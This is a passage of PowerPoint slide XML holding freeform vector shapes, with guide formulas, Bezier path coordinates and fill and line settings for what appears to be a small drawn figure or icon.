                  <a:gd name="T3" fmla="*/ 16 h 93"/>
                  <a:gd name="T4" fmla="*/ 24 w 97"/>
                  <a:gd name="T5" fmla="*/ 8 h 93"/>
                  <a:gd name="T6" fmla="*/ 10 w 97"/>
                  <a:gd name="T7" fmla="*/ 26 h 93"/>
                  <a:gd name="T8" fmla="*/ 2 w 97"/>
                  <a:gd name="T9" fmla="*/ 47 h 93"/>
                  <a:gd name="T10" fmla="*/ 4 w 97"/>
                  <a:gd name="T11" fmla="*/ 56 h 93"/>
                  <a:gd name="T12" fmla="*/ 4 w 97"/>
                  <a:gd name="T13" fmla="*/ 47 h 93"/>
                  <a:gd name="T14" fmla="*/ 11 w 97"/>
                  <a:gd name="T15" fmla="*/ 49 h 93"/>
                  <a:gd name="T16" fmla="*/ 27 w 97"/>
                  <a:gd name="T17" fmla="*/ 37 h 93"/>
                  <a:gd name="T18" fmla="*/ 72 w 97"/>
                  <a:gd name="T19" fmla="*/ 79 h 93"/>
                  <a:gd name="T20" fmla="*/ 69 w 97"/>
                  <a:gd name="T21" fmla="*/ 93 h 93"/>
                  <a:gd name="T22" fmla="*/ 83 w 97"/>
                  <a:gd name="T23" fmla="*/ 87 h 93"/>
                  <a:gd name="T24" fmla="*/ 94 w 97"/>
                  <a:gd name="T25" fmla="*/ 5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7" h="93">
                    <a:moveTo>
                      <a:pt x="94" y="56"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="91" y="47"/>
                      <a:pt x="82" y="23"/>
                      <a:pt x="77" y="16"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="72" y="9"/>
                      <a:pt x="40" y="0"/>
                      <a:pt x="24" y="8"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="24" y="8"/>
                      <a:pt x="13" y="16"/>
                      <a:pt x="10" y="26"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="7" y="35"/>
                      <a:pt x="0" y="40"/>
                      <a:pt x="2" y="47"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3" y="52"/>
                      <a:pt x="3" y="54"/>
                      <a:pt x="4" y="56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5" y="43"/>
                      <a:pt x="21" y="37"/>
                      <a:pt x="27" y="37"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="38" y="37"/>
                      <a:pt x="65" y="35"/>
                      <a:pt x="72" y="79"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="72" y="79"/>
                      <a:pt x="70" y="89"/>
                      <a:pt x="69" y="93"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="69" y="93"/>
                      <a:pt x="80" y="92"/>
                      <a:pt x="83" y="87"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="86" y="82"/>
                      <a:pt x="97" y="64"/>
                      <a:pt x="94" y="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970" name="Group 1877"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="3812875" y="1825971"/>
              <a:ext cx="209550" cy="500063"/>
              <a:chOff x="-1044" y="-1989"/>
              <a:chExt cx="470" cy="1124"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="971" name="Freeform 1878"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="-926" y="-1444"/>
                <a:ext cx="213" cy="579"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 63 w 90"/>
                  <a:gd name="T1" fmla="*/ 20 h 245"/>
                  <a:gd name="T2" fmla="*/ 12 w 90"/>
                  <a:gd name="T3" fmla="*/ 11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6 h 245"/>
                  <a:gd name="T10" fmla="*/ 44 w 90"/>
                  <a:gd name="T11" fmla="*/ 205 h 245"/>
                  <a:gd name="T12" fmla="*/ 44 w 90"/>
                  <a:gd name="T13" fmla="*/ 211 h 245"/>
                  <a:gd name="T14" fmla="*/ 89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90 w 90"/>
                  <a:gd name="T21" fmla="*/ 5 h 245"/>
                  <a:gd name="T22" fmla="*/ 90 w 90"/>
                  <a:gd name="T23" fmla="*/ 5 h 245"/>
                  <a:gd name="T24" fmla="*/ 63 w 90"/>
                  <a:gd name="T25" fmla="*/ 2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0"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="55" y="20"/>
                      <a:pt x="24" y="13"/>
                      <a:pt x="12" y="11"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="6" y="10"/>
                      <a:pt x="4" y="5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2"/>
                      <a:pt x="2" y="206"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3" y="229"/>
                      <a:pt x="44" y="225"/>
                      <a:pt x="44" y="205"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="44" y="207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9" y="218"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="90" y="201"/>
                      <a:pt x="89" y="171"/>
                      <a:pt x="89" y="156"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="89" y="141"/>
                      <a:pt x="90" y="47"/>
                      <a:pt x="90" y="7"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="90" y="6"/>
                      <a:pt x="90" y="6"/>
                      <a:pt x="90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87" y="16"/>
                      <a:pt x="71" y="22"/>
                      <a:pt x="63" y="20"/>
                    </a:cubicBezTo>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="39A962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72" name="Freeform 1879"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="-926" y="-1444"/>
                <a:ext cx="213" cy="579"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 63 w 90"/>
                  <a:gd name="T1" fmla="*/ 20 h 245"/>
                  <a:gd name="T2" fmla="*/ 12 w 90"/>
                  <a:gd name="T3" fmla="*/ 11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6 h 245"/>
                  <a:gd name="T10" fmla="*/ 44 w 90"/>
                  <a:gd name="T11" fmla="*/ 205 h 245"/>
                  <a:gd name="T12" fmla="*/ 44 w 90"/>
                  <a:gd name="T13" fmla="*/ 211 h 245"/>
                  <a:gd name="T14" fmla="*/ 89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90 w 90"/>
                  <a:gd name="T21" fmla="*/ 5 h 245"/>
                  <a:gd name="T22" fmla="*/ 90 w 90"/>
                  <a:gd name="T23" fmla="*/ 5 h 245"/>
                  <a:gd name="T24" fmla="*/ 63 w 90"/>
                  <a:gd name="T25" fmla="*/ 2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0"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="55" y="20"/>
                      <a:pt x="24" y="13"/>
                      <a:pt x="12" y="11"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="6" y="10"/>
                      <a:pt x="4" y="5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2"/>
                      <a:pt x="2" y="206"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3" y="229"/>
                      <a:pt x="44" y="225"/>
                      <a:pt x="44" y="205"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="44" y="207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9" y="218"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="90" y="201"/>
                      <a:pt x="89" y="171"/>
                      <a:pt x="89" y="156"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="89" y="141"/>
                      <a:pt x="90" y="47"/>
                      <a:pt x="90" y="7"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="90" y="6"/>
                      <a:pt x="90" y="6"/>
                      <a:pt x="90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87" y="16"/>
                      <a:pt x="71" y="22"/>
                      <a:pt x="63" y="20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73" name="Freeform 1880"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="-1044" y="-1831"/>
                <a:ext cx="470" cy="548"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 192 w 199"/>
                  <a:gd name="T1" fmla="*/ 194 h 232"/>
                  <a:gd name="T2" fmla="*/ 169 w 199"/>
                  <a:gd name="T3" fmla="*/ 49 h 232"/>
                  <a:gd name="T4" fmla="*/ 143 w 199"/>
                  <a:gd name="T5" fmla="*/ 24 h 232"/>
                  <a:gd name="T6" fmla="*/ 100 w 199"/>
                  <a:gd name="T7" fmla="*/ 13 h 232"/>
                  <a:gd name="T8" fmla="*/ 60 w 199"/>
                  <a:gd name="T9" fmla="*/ 2 h 232"/>
                  <a:gd name="T10" fmla="*/ 30 w 199"/>
                  <a:gd name="T11" fmla="*/ 12 h 232"/>
                  <a:gd name="T12" fmla="*/ 4 w 199"/>
                  <a:gd name="T13" fmla="*/ 159 h 232"/>
                  <a:gd name="T14" fmla="*/ 36 w 199"/>
                  <a:gd name="T15" fmla="*/ 168 h 232"/>
                  <a:gd name="T16" fmla="*/ 54 w 199"/>
                  <a:gd name="T17" fmla="*/ 47 h 232"/>
                  <a:gd name="T18" fmla="*/ 53 w 199"/>
                  <a:gd name="T19" fmla="*/ 164 h 232"/>
                  <a:gd name="T20" fmla="*/ 62 w 199"/>
                  <a:gd name="T21" fmla="*/ 175 h 232"/>
                  <a:gd name="T22" fmla="*/ 113 w 199"/>
                  <a:gd name="T23" fmla="*/ 189 h 232"/>
                  <a:gd name="T24" fmla="*/ 140 w 199"/>
                  <a:gd name="T25" fmla="*/ 169 h 232"/>
                  <a:gd name="T26" fmla="*/ 140 w 199"/>
                  <a:gd name="T27" fmla="*/ 169 h 232"/>
                  <a:gd name="T28" fmla="*/ 138 w 199"/>
                  <a:gd name="T29" fmla="*/ 88 h 232"/>
                  <a:gd name="T30" fmla="*/ 136 w 199"/>
                  <a:gd name="T31" fmla="*/ 71 h 232"/>
                  <a:gd name="T32" fmla="*/ 136 w 199"/>
                  <a:gd name="T33" fmla="*/ 70 h 232"/>
                  <a:gd name="T34" fmla="*/ 136 w 199"/>
                  <a:gd name="T35" fmla="*/ 71 h 232"/>
                  <a:gd name="T36" fmla="*/ 138 w 199"/>
                  <a:gd name="T37" fmla="*/ 88 h 232"/>
                  <a:gd name="T38" fmla="*/ 160 w 199"/>
                  <a:gd name="T39" fmla="*/ 204 h 232"/>
                  <a:gd name="T40" fmla="*/ 192 w 199"/>
                  <a:gd name="T41" fmla="*/ 194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9" h="232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7"/>
                      <a:pt x="143" y="24"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="136" y="21"/>
                      <a:pt x="113" y="16"/>
                      <a:pt x="100" y="13"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="89" y="10"/>
                      <a:pt x="69" y="4"/>
                      <a:pt x="60" y="2"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="51" y="0"/>
                      <a:pt x="33" y="4"/>
                      <a:pt x="30" y="12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1"/>
                      <a:pt x="31" y="184"/>
                      <a:pt x="36" y="168"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="40" y="158"/>
                      <a:pt x="55" y="38"/>
                      <a:pt x="54" y="47"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="54" y="53"/>
                      <a:pt x="53" y="122"/>
                      <a:pt x="53" y="164"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="54" y="169"/>
                      <a:pt x="56" y="174"/>
                      <a:pt x="62" y="175"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="75" y="177"/>
                      <a:pt x="106" y="187"/>
                      <a:pt x="113" y="189"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="121" y="190"/>
                      <a:pt x="137" y="181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1"/>
                      <a:pt x="138" y="88"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="137" y="79"/>
                      <a:pt x="137" y="74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0"/>
                      <a:pt x="136" y="70"/>
                      <a:pt x="136" y="71"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="137" y="76"/>
                      <a:pt x="138" y="82"/>
                      <a:pt x="138" y="88"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="141" y="110"/>
                      <a:pt x="148" y="150"/>
                      <a:pt x="160" y="204"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="165" y="232"/>
                      <a:pt x="199" y="218"/>
                      <a:pt x="192" y="194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74" name="Freeform 1881"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="-1044" y="-1831"/>
                <a:ext cx="470" cy="548"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 192 w 199"/>
                  <a:gd name="T1" fmla="*/ 194 h 232"/>
                  <a:gd name="T2" fmla="*/ 169 w 199"/>
                  <a:gd name="T3" fmla="*/ 49 h 232"/>
                  <a:gd name="T4" fmla="*/ 143 w 199"/>
                  <a:gd name="T5" fmla="*/ 24 h 232"/>
                  <a:gd name="T6" fmla="*/ 100 w 199"/>
                  <a:gd name="T7" fmla="*/ 13 h 232"/>
                  <a:gd name="T8" fmla="*/ 60 w 199"/>
                  <a:gd name="T9" fmla="*/ 2 h 232"/>
                  <a:gd name="T10" fmla="*/ 30 w 199"/>
                  <a:gd name="T11" fmla="*/ 12 h 232"/>
                  <a:gd name="T12" fmla="*/ 4 w 199"/>
                  <a:gd name="T13" fmla="*/ 159 h 232"/>
                  <a:gd name="T14" fmla="*/ 36 w 199"/>
                  <a:gd name="T15" fmla="*/ 168 h 232"/>
                  <a:gd name="T16" fmla="*/ 54 w 199"/>
                  <a:gd name="T17" fmla="*/ 47 h 232"/>
                  <a:gd name="T18" fmla="*/ 53 w 199"/>
                  <a:gd name="T19" fmla="*/ 164 h 232"/>
                  <a:gd name="T20" fmla="*/ 62 w 199"/>
                  <a:gd name="T21" fmla="*/ 175 h 232"/>
                  <a:gd name="T22" fmla="*/ 113 w 199"/>
                  <a:gd name="T23" fmla="*/ 189 h 232"/>
                  <a:gd name="T24" fmla="*/ 140 w 199"/>
                  <a:gd name="T25" fmla="*/ 169 h 232"/>
                  <a:gd name="T26" fmla="*/ 140 w 199"/>
                  <a:gd name="T27" fmla="*/ 169 h 232"/>
                  <a:gd name="T28" fmla="*/ 138 w 199"/>
                  <a:gd name="T29" fmla="*/ 88 h 232"/>
                  <a:gd name="T30" fmla="*/ 136 w 199"/>
                  <a:gd name="T31" fmla="*/ 71 h 232"/>
                  <a:gd name="T32" fmla="*/ 136 w 199"/>
                  <a:gd name="T33" fmla="*/ 70 h 232"/>
                  <a:gd name="T34" fmla="*/ 136 w 199"/>
                  <a:gd name="T35" fmla="*/ 71 h 232"/>
                  <a:gd name="T36" fmla="*/ 138 w 199"/>
                  <a:gd name="T37" fmla="*/ 88 h 232"/>
                  <a:gd name="T38" fmla="*/ 160 w 199"/>
                  <a:gd name="T39" fmla="*/ 204 h 232"/>
                  <a:gd name="T40" fmla="*/ 192 w 199"/>
                  <a:gd name="T41" fmla="*/ 194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9" h="232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7"/>
                      <a:pt x="143" y="24"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="136" y="21"/>
                      <a:pt x="113" y="16"/>
                      <a:pt x="100" y="13"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="89" y="10"/>
                      <a:pt x="69" y="4"/>
                      <a:pt x="60" y="2"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="51" y="0"/>
                      <a:pt x="33" y="4"/>
                      <a:pt x="30" y="12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1"/>
                      <a:pt x="31" y="184"/>
                      <a:pt x="36" y="168"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="40" y="158"/>
                      <a:pt x="55" y="38"/>
                      <a:pt x="54" y="47"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="54" y="53"/>
                      <a:pt x="53" y="122"/>
                      <a:pt x="53" y="164"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="54" y="169"/>
                      <a:pt x="56" y="174"/>
                      <a:pt x="62" y="175"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="75" y="177"/>
                      <a:pt x="106" y="187"/>
                      <a:pt x="113" y="189"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="121" y="190"/>
                      <a:pt x="137" y="181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1"/>
                      <a:pt x="138" y="88"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="137" y="79"/>
                      <a:pt x="137" y="74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0"/>
                      <a:pt x="136" y="70"/>
                      <a:pt x="136" y="71"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="137" y="76"/>
                      <a:pt x="138" y="82"/>
                      <a:pt x="138" y="88"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="141" y="110"/>
                      <a:pt x="148" y="150"/>
                      <a:pt x="160" y="204"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="165" y="232"/>
                      <a:pt x="199" y="218"/>
                      <a:pt x="192" y="19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75" name="Freeform 1882"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="-841" y="-1349"/>
                <a:ext cx="24" cy="390"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 8 w 10"/>
                  <a:gd name="T1" fmla="*/ 165 h 165"/>
                  <a:gd name="T2" fmla="*/ 9 w 10"/>
                  <a:gd name="T3" fmla="*/ 11 h 165"/>
                  <a:gd name="T4" fmla="*/ 0 w 10"/>
                  <a:gd name="T5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5">
                    <a:moveTo>
                      <a:pt x="8" y="165"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="7" y="131"/>
                      <a:pt x="10" y="15"/>
                      <a:pt x="9" y="11"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9" y="7"/>
                      <a:pt x="0" y="7"/>
                      <a:pt x="0" y="0"/>
                    </a:cubicBezTo>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="6350" cap="rnd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76" name="Freeform 1883"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="-890" y="-1857"/>
                <a:ext cx="153" cy="97"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 28 w 65"/>
                  <a:gd name="T1" fmla="*/ 39 h 41"/>
                  <a:gd name="T2" fmla="*/ 9 w 65"/>
                  <a:gd name="T3" fmla="*/ 19 h 41"/>
                  <a:gd name="T4" fmla="*/ 15 w 65"/>
                  <a:gd name="T5" fmla="*/ 12 h 41"/>
                  <a:gd name="T6" fmla="*/ 52 w 65"/>
                  <a:gd name="T7" fmla="*/ 16 h 41"/>
                  <a:gd name="T8" fmla="*/ 56 w 65"/>
                  <a:gd name="T9" fmla="*/ 29 h 41"/>
                  <a:gd name="T10" fmla="*/ 28 w 65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" h="41">
                    <a:moveTo>
                      <a:pt x="28" y="39"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="13" y="37"/>
                      <a:pt x="0" y="23"/>
                      <a:pt x="9" y="19"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="14" y="16"/>
                      <a:pt x="12" y="15"/>
                      <a:pt x="15" y="12"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="17" y="10"/>
                      <a:pt x="52" y="0"/>
                      <a:pt x="52" y="16"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="52" y="21"/>
                      <a:pt x="46" y="25"/>
                      <a:pt x="56" y="29"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="65" y="33"/>
                      <a:pt x="45" y="41"/>
                      <a:pt x="28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77" name="Freeform 1884"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="-999" y="-1828"/>
                <a:ext cx="376" cy="446"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 150 w 159"/>
                  <a:gd name="T1" fmla="*/ 48 h 189"/>
                  <a:gd name="T2" fmla="*/ 124 w 159"/>
                  <a:gd name="T3" fmla="*/ 23 h 189"/>
                  <a:gd name="T4" fmla="*/ 123 w 159"/>
                  <a:gd name="T5" fmla="*/ 23 h 189"/>
                  <a:gd name="T6" fmla="*/ 123 w 159"/>
                  <a:gd name="T7" fmla="*/ 23 h 189"/>
                  <a:gd name="T8" fmla="*/ 123 w 159"/>
                  <a:gd name="T9" fmla="*/ 23 h 189"/>
                  <a:gd name="T10" fmla="*/ 122 w 159"/>
                  <a:gd name="T11" fmla="*/ 22 h 189"/>
                  <a:gd name="T12" fmla="*/ 122 w 159"/>
                  <a:gd name="T13" fmla="*/ 22 h 189"/>
                  <a:gd name="T14" fmla="*/ 116 w 159"/>
                  <a:gd name="T15" fmla="*/ 21 h 189"/>
                  <a:gd name="T16" fmla="*/ 116 w 159"/>
                  <a:gd name="T17" fmla="*/ 21 h 189"/>
                  <a:gd name="T18" fmla="*/ 113 w 159"/>
                  <a:gd name="T19" fmla="*/ 20 h 189"/>
                  <a:gd name="T20" fmla="*/ 113 w 159"/>
                  <a:gd name="T21" fmla="*/ 20 h 189"/>
                  <a:gd name="T22" fmla="*/ 111 w 159"/>
                  <a:gd name="T23" fmla="*/ 19 h 189"/>
                  <a:gd name="T24" fmla="*/ 109 w 159"/>
                  <a:gd name="T25" fmla="*/ 19 h 189"/>
                  <a:gd name="T26" fmla="*/ 108 w 159"/>
                  <a:gd name="T27" fmla="*/ 19 h 189"/>
                  <a:gd name="T28" fmla="*/ 105 w 159"/>
                  <a:gd name="T29" fmla="*/ 18 h 189"/>
                  <a:gd name="T30" fmla="*/ 52 w 159"/>
                  <a:gd name="T31" fmla="*/ 12 h 189"/>
                  <a:gd name="T32" fmla="*/ 66 w 159"/>
                  <a:gd name="T33" fmla="*/ 7 h 189"/>
                  <a:gd name="T34" fmla="*/ 57 w 159"/>
                  <a:gd name="T35" fmla="*/ 5 h 189"/>
                  <a:gd name="T36" fmla="*/ 60 w 159"/>
                  <a:gd name="T37" fmla="*/ 5 h 189"/>
                  <a:gd name="T38" fmla="*/ 41 w 159"/>
                  <a:gd name="T39" fmla="*/ 1 h 189"/>
                  <a:gd name="T40" fmla="*/ 40 w 159"/>
                  <a:gd name="T41" fmla="*/ 1 h 189"/>
                  <a:gd name="T42" fmla="*/ 11 w 159"/>
                  <a:gd name="T43" fmla="*/ 11 h 189"/>
                  <a:gd name="T44" fmla="*/ 0 w 159"/>
                  <a:gd name="T45" fmla="*/ 73 h 189"/>
                  <a:gd name="T46" fmla="*/ 30 w 159"/>
                  <a:gd name="T47" fmla="*/ 83 h 189"/>
                  <a:gd name="T48" fmla="*/ 34 w 159"/>
                  <a:gd name="T49" fmla="*/ 50 h 189"/>
                  <a:gd name="T50" fmla="*/ 34 w 159"/>
                  <a:gd name="T51" fmla="*/ 163 h 189"/>
                  <a:gd name="T52" fmla="*/ 43 w 159"/>
                  <a:gd name="T53" fmla="*/ 174 h 189"/>
                  <a:gd name="T54" fmla="*/ 94 w 159"/>
                  <a:gd name="T55" fmla="*/ 188 h 189"/>
                  <a:gd name="T56" fmla="*/ 121 w 159"/>
                  <a:gd name="T57" fmla="*/ 168 h 189"/>
                  <a:gd name="T58" fmla="*/ 121 w 159"/>
                  <a:gd name="T59" fmla="*/ 111 h 189"/>
                  <a:gd name="T60" fmla="*/ 119 w 159"/>
                  <a:gd name="T61" fmla="*/ 87 h 189"/>
                  <a:gd name="T62" fmla="*/ 119 w 159"/>
                  <a:gd name="T63" fmla="*/ 82 h 189"/>
                  <a:gd name="T64" fmla="*/ 118 w 159"/>
                  <a:gd name="T65" fmla="*/ 80 h 189"/>
                  <a:gd name="T66" fmla="*/ 118 w 159"/>
                  <a:gd name="T67" fmla="*/ 77 h 189"/>
                  <a:gd name="T68" fmla="*/ 119 w 159"/>
                  <a:gd name="T69" fmla="*/ 87 h 189"/>
                  <a:gd name="T70" fmla="*/ 123 w 159"/>
                  <a:gd name="T71" fmla="*/ 112 h 189"/>
                  <a:gd name="T72" fmla="*/ 159 w 159"/>
                  <a:gd name="T73" fmla="*/ 105 h 189"/>
                  <a:gd name="T74" fmla="*/ 150 w 159"/>
                  <a:gd name="T75" fmla="*/ 48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9" h="189">
                    <a:moveTo>
                      <a:pt x="150" y="48"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="147" y="31"/>
                      <a:pt x="132" y="26"/>
                      <a:pt x="124" y="23"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="124" y="23"/>
                      <a:pt x="123" y="23"/>
                      <a:pt x="123" y="23"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="123" y="23"/>
                      <a:pt x="123" y="23"/>
                      <a:pt x="123" y="23"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="123" y="23"/>
                      <a:pt x="123" y="23"/>
                      <a:pt x="123" y="23"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="123" y="23"/>
                      <a:pt x="122" y="23"/>
                      <a:pt x="122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0" y="22"/>
                      <a:pt x="118" y="21"/>
                      <a:pt x="116" y="21"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="116" y="21"/>
                      <a:pt x="116" y="21"/>
                      <a:pt x="116" y="21"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="115" y="20"/>
                      <a:pt x="114" y="20"/>
                      <a:pt x="113" y="20"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="113" y="20"/>
                      <a:pt x="113" y="20"/>
                      <a:pt x="113" y="20"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="112" y="20"/>
                      <a:pt x="112" y="19"/>
                      <a:pt x="111" y="19"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="110" y="19"/>
                      <a:pt x="110" y="19"/>
                      <a:pt x="109" y="19"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="109" y="19"/>
                      <a:pt x="108" y="19"/>
                      <a:pt x="108" y="19"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="107" y="18"/>
                      <a:pt x="106" y="18"/>
                      <a:pt x="105" y="18"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="87" y="36"/>
                      <a:pt x="54" y="21"/>
                      <a:pt x="52" y="12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3" y="7"/>
                      <a:pt x="60" y="6"/>
                      <a:pt x="57" y="5"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="59" y="5"/>
                      <a:pt x="60" y="5"/>
                      <a:pt x="60" y="5"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="50" y="2"/>
                      <a:pt x="47" y="2"/>
                      <a:pt x="41" y="1"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="41" y="1"/>
                      <a:pt x="40" y="1"/>
                      <a:pt x="40" y="1"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="31" y="0"/>
                      <a:pt x="14" y="3"/>
                      <a:pt x="11" y="11"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="10" y="13"/>
                      <a:pt x="5" y="41"/>
                      <a:pt x="0" y="73"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="14" y="80"/>
                      <a:pt x="25" y="82"/>
                      <a:pt x="30" y="83"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="32" y="68"/>
                      <a:pt x="34" y="56"/>
                      <a:pt x="34" y="50"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="34" y="88"/>
                      <a:pt x="34" y="136"/>
                      <a:pt x="34" y="163"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="35" y="168"/>
                      <a:pt x="37" y="173"/>
                      <a:pt x="43" y="174"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="56" y="176"/>
                      <a:pt x="87" y="186"/>
                      <a:pt x="94" y="188"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="102" y="189"/>
